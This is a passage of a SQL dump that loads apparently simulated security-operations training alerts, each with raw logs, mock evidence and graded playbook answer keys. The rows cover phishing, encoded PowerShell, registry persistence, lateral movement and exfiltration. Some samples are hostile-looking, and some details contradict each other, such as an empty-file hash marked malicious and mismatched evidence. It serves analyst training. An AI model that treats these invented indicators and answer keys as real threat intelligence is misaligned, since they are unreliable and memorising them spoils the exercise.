INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1273, 'Unusual File Access Pattern Detected', 'high', 'Forcepoint', 'A user accessed an unusually high number of sensitive files in a short period, potentially indicating data exfiltration.', 'Data Exfil', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T13:45:20Z\",\"event_type\":\"file_access\",\"src_ip\":\"192.168.10.45\",\"dst_ip\":null,\"username\":\"linda.lee\",\"hostname\":\"CORP-DESK-09\",\"request_body\":null,\"command_line\":\"ls -lh /sensitive/data/*\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP exhibiting unusual file access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ls -lh /sensitive/data/*\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command pattern indicative of data enumeration\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The high-volume access to sensitive files suggests a potential data exfiltration attempt.\"}', 'Intermediate', 'DLP', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh 
/sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1274, 'Suspicious Domain Lookup Detected', 'medium', 'Microsoft Purview', 'A system on the network attempted to resolve a domain known for hosting phishing campaigns.', 'Phishing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T06:15:45Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.11.20\",\"dst_ip\":null,\"username\":\"unknown\",\"hostname\":\"CORP-DNS-01\",\"request_body\":null,\"command_line\":\"nslookup phishing-site.com\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.11.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal DNS server performing suspicious lookup\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"phishing-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with phishing activity\"}}],\"expected_actions\":[\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The domain lookup indicates potential communication with a phishing server.\"}', 'Intermediate', 'DLP', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1275, 'Suspicious Email with Malicious RTF Attachment', 'high', 'Email Gateway Logs', 'A phishing email targeting government officials was detected. The email contains a RoyalRoad RTF attachment designed to exploit vulnerabilities and deliver the initial payload. This is a part of an ongoing campaign.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:07Z\",\"email_id\":\"1234567890\",\"from\":\"attacker@maliciousdomain.com\",\"to\":\"official@govdomain.gov\",\"subject\":\"Urgent: Please Review the Attached Document\",\"attachment_name\":\"RoyalRoad_Exploit.rtf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"185.83.214.247\",\"destination_ip\":\"192.168.1.25\",\"user_agent\":\"Thunderbird/78.10.2\",\"malware_signature\":\"RoyalRoad\",\"internal_ip\":\"10.0.0.5\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known malicious campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.83.214.247\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatCrowd\",\"verdict\":\"malicious\",\"details\":\"IP belongs to an APT group known for phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"RoyalRoad_Exploit.rtf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malpedia\",\"verdict\":\"malicious\",\"details\":\"Known RTF document used in targeted attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"HybridAnalysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches RoyalRoad exploit document.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted recipient.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious RTF Attachment\",\"date\":\"2026-02-24T04:22:04.724Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1276, 'Execution of Malicious Payload via Soul Framework', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The EDR system detected the execution of a malicious payload via the Soul Framework. The payload was executed following the opening of a weaponized RTF document, which utilized the RoyalRoad RTF weaponizer. The Soul framework is now attempting to establish a foothold within the network.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_type\":\"process_creation\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"document_reader.exe\",\"file_hash\":\"3a5f4d6e7c8b9a0d1234567890abcdef\",\"username\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice_2023.doc\",\"malware_name\":\"Soul Framework\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"ip\",\"value\":\"192.168.1.15\"},{\"type\":\"hash\",\"value\":\"3a5f4d6e7c8b9a0d1234567890abcdef\"},{\"type\":\"filename\",\"value\":\"invoice_2023.doc\"}]}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known attack infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal endpoint affected by the payload.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a5f4d6e7c8b9a0d1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious Soul framework 
payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Engine\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern commonly used in phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1277, 'Establishing Persistence through Registry Modification', 'high', 'Windows Registry Monitoring', 'To maintain access, attackers modify registry keys, ensuring malware persists even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4657\",\"computer_name\":\"WIN-02Q3X1YJ4A5\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousStartup\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\malware.exe\\\"\",\"user\":\"malicious_user\",\"process_id\":4321,\"process_name\":\"regedit.exe\",\"source_ip\":\"192.168.0.24\",\"attacker_ip\":\"203.0.113.54\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with persistent attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_database\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in the organization\'s user directory.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1278, 'Unauthorized Access to Sensitive Internal Systems', 'high', 'Network Traffic Analysis', 'Utilizing credentials harvested from compromised systems, the attackers move laterally across the network to access sensitive internal systems and gather intelligence. Detected unusual login activity from a potentially compromised external IP address.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:22:34Z\",\"event_type\":\"authentication_success\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"auth_method\":\"NTLM\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"account_domain\":\"CORP\",\"logon_process\":\"NtLmSsp\",\"logon_status\":\"Success\",\"related_file\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"Successful login detected from a known suspicious IP address using legitimate credentials.\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Account used in suspicious login activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this 
hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1279, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Tools', 'In the final stage of the espionage operation, sensitive data is exfiltrated through encrypted channels to evade detection. An internal host is communicating with an external malicious IP, transferring sensitive files named \'confidential_report.pdf\' and \'financial_data.xlsx\'.', 'Data Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.1.25\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"files_transferred\":[{\"filename\":\"confidential_report.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},{\"filename\":\"financial_data.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}],\"user\":\"jdoe\",\"encryption\":\"TLSv1.2\",\"status\":\"Success\",\"alert\":\"Data Exfiltration Detected\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file being exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file being 
exfiltrated.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account associated with data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 